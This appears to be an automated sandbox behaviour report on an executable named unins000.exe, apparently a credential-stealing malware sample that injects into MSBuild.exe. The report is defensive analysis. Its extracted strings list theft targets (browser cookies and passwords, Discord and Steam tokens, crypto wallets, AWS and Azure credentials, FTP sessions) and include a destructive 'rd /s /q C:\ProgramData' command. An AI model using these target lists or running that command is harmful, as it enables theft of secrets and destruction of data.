Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\unins000.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: unins000.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: unins000.exe Static file information: File size 5546639 > 1048576
Source: unins000.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c5000
Source: unins000.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x221800
Source: unins000.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: unins000.exe, 00000000.00000002.2404445235.0000000003B9F000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: unins000.exe, 00000000.00000002.2427363396.0000000004A57000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2438196636.0000000007040000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: unins000.exe, 00000000.00000002.2427363396.0000000004A57000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2438196636.0000000007040000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

barindex
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.3.unins000.exe.4cd4960.3.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.3.unins000.exe.4cd4960.3.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.3.unins000.exe.4cd4960.3.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.3.unins000.exe.4cd4960.3.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.3.unins000.exe.4cd4960.3.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.unins000.exe.6f60000.10.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.unins000.exe.6f60000.10.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.unins000.exe.6f60000.10.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.unins000.exe.6f60000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.unins000.exe.6f60000.10.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 0.2.unins000.exe.6ed0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.unins000.exe.6ed0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.unins000.exe.4c4d920.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.unins000.exe.4c4d920.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2395583377.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2436204399.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2404445235.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: unins000.exe PID: 6532, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_0040E886
Source: unins000.exe Static PE information: real checksum: 0xaa69e19 should be: 0x54de9e
Source: unins000.exe Static PE information: section name: .didata
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F4C2A5 push es; ret 0_2_06F4C2B4
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F45E6B push es; retf 0_2_06F45E74
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F4C223 push es; retf 0_2_06F4C224
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F45CE1 push es; iretd 0_2_06F45DAC
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F43D98 pushfd ; ret 0_2_06F43D9B
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F46D3F push es; ret 0_2_06F46D44
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F54E99 push es; ret 0_2_06F54F74
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5D680 push cs; iretd 0_2_06F5D7AE
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F59598 push es; retf 0_2_06F595B8
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FBCF8E pushad ; iretd 0_2_06FBCF91
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FB8CE8 push esp; iretd 0_2_06FB8CF5
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FB0DE8 push eax; retf 0_2_06FB0DE9
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FB0006 push es; iretd 0_2_06FB001C
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FE261B push FFFFFF8Bh; iretd 0_2_06FE261F
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FEEFB0 push es; retf 0_2_06FEEFBC
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FE2743 push FFFFFF8Bh; iretd 0_2_06FE2747
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FE25CC push FFFFFF8Bh; ret 0_2_06FE25CE
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FEAA70 push es; ret 0_2_06FEAA80
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FEFA40 pushfd ; ret 0_2_06FEFA41
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07025F39 pushad ; iretd 0_2_07025F3D
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07025A9D pushad ; iretd 0_2_07025AB1
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_072D802C push esp; retf 0_2_072D802D
Source: 0.2.unins000.exe.5ff0000.6.raw.unpack, TLTC1w0r5pjZEdnlDje.cs High entropy of concatenated method names: 'xF10Ueixfk', 'Gyu0xqbFBL', 'WTh0eaHY2F', 'jZa021iDRv', 'Vfa0fmGUYv', 's6R0VMcp49', 'CmS0YYl2TM', 'zvr0GN2WJA', 'BZj0tZfXwt', 'pYU0yxi5vU'

Boot Survival

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_0040E886
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: unins000.exe, 00000000.00000002.2404445235.0000000003A01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\unins000.exe Memory allocated: 3080000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory allocated: 3A00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Memory allocated: 5A00000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\SysWOW64\timeout.exe TID: 5372 Thread sleep count: 90 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 3_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 3_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 3_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 3_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 3_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 3_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 3_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040DF8C GetSystemInfo,wsprintfA, 3_2_0040DF8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe, 00000005.00000002.2636509629.000077B000760000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: 5x47q9.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: chrome.exe, 00000005.00000002.2638189784.000077B000A90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=17003e26-6185-47e2-a725-b174883e6ccd
Source: 5x47q9.3.dr Binary or memory string: discord.comVMware20,11696428655f
Source: 5x47q9.3.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 5x47q9.3.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
